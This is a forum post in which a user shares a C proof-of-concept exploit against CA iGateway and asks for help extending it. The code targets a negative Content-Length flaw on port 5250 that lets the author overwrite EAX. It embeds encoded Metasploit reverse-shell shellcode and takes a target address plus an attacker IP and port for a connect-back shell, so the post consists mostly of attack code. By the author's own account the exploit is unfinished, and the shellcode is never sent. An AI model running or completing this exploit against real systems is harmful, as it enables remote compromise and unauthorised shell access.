Hey, guys I tested this code on a XP SP2 machine..
hope someone can help me further :P :P :P ...
Greets, mon11
//After reading:
http://www.frsirt.com/english/advisories/2006/0311
//And downloading @
ftp://ftp.ca.com (/priv/trial/BABr11/)
//I made some code maybe somebody can help me with this one after sending this code 2 times I can completely overwrite EAX:
Code:
//IgateWay.exe negative content POC exploit
//coded by: mr N00B / mon11
//After sending 2 times we have complete control of EAX
//Don't have a clue what to do next :P
//noob_mon11@hotmail.com
#include <stdio.h>
#include "winsock2.h"
int bytesSent;
int _tmain (int argc, _TCHAR* argv[])
{
unsigned char reverseshell[] = //metasploit shit
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
if (argc != 4){
printf ("Usage:\n------\n%s <Target_IP> <Hacker_IP> <Hacker_Port>\n\n",argv[0] );
printf ("\nExample:\n%s 207.68.178.16 192.168.1.100 65130\n\n",argv[0]);
printf ("Explain:\n--------\nThis will exploit target 207.68.178.16:5250 \nand connect back on 192.168.1.100:65130 via Tcp\n");
printf ("\n----> testing by mon11<-----\n");
exit(0);}
int port = 5250; //Hard Coded for Igateway
int protocol = 2; //Hard Coded TCP
unsigned long Reverse_ip = inet_addr (argv[2] ) ^ ( unsigned long ) 0x99999999;
unsigned short Reverse_port =htons( atoi (argv [3])) ^ ( unsigned short ) 0x9999;
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )printf("Error at WSAStartup()\n");
SOCKET s;
if (protocol==1) s = socket( AF_INET, SOCK_DGRAM, 0 );
if (protocol==2) s = socket( AF_INET, SOCK_STREAM,IPPROTO_IP);
if ( s == INVALID_SOCKET ) {
printf( "Error at socket(): %ld\n", WSAGetLastError() );
WSACleanup();
return 0 ;
}
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr(argv [1]);
clientService.sin_port = htons (port);
if ( connect( s, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( "Failed to connect.\n" );
WSACleanup();
return 0;
}
// Most important stuff
////////////////////////////////////////////////////////////////////////////////////////
char payload [70]; //70 EAX=414141 after sending twice
memset (payload,0X41,sizeof (payload));
memcpy (payload ,"POST / HTTP/1.0\r\n",17);
memcpy (payload + 17,"Content-Length: -41\r\n\r\n",23); //-41 (bad request)
memcpy (payload + sizeof (payload)-3,"\r\n\0",3);
//printf ("%s",payload); //To see what is going on
////////////////////////////////////////////////////////////////////////////////////////
// End of important stuff.
// UDP
if (protocol==1) bytesSent = sendto(s,payload, sizeof (payload),0, (SOCKADDR*) &clientService, sizeof(clientService));
// TCP
if (protocol==2) {
bytesSent = send(s, payload, sizeof(payload),0);
char recvbuf[sizeof (payload)] = "";
int bytesRecv = SOCKET_ERROR;
while( bytesRecv != SOCKET_ERROR ) {
bytesRecv = recv( s, recvbuf, sizeof (recvbuf), 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) {
printf( "Connection Closed.\n");
break;
}
if (bytesRecv < 0){
printf ("BytesSent: %i\n",bytesSent);
printf ("BytesRecv: %i",bytesRecv);
return 0;
}
}
printf ("BytesSent: %i\n",bytesSent);
printf ("BytesRecv: %i",bytesRecv);
closesocket (s);
WSACleanup();
return 0;
}
} 
27-01-06
CA IgateWay 
Linear Mode
Similar Threads 
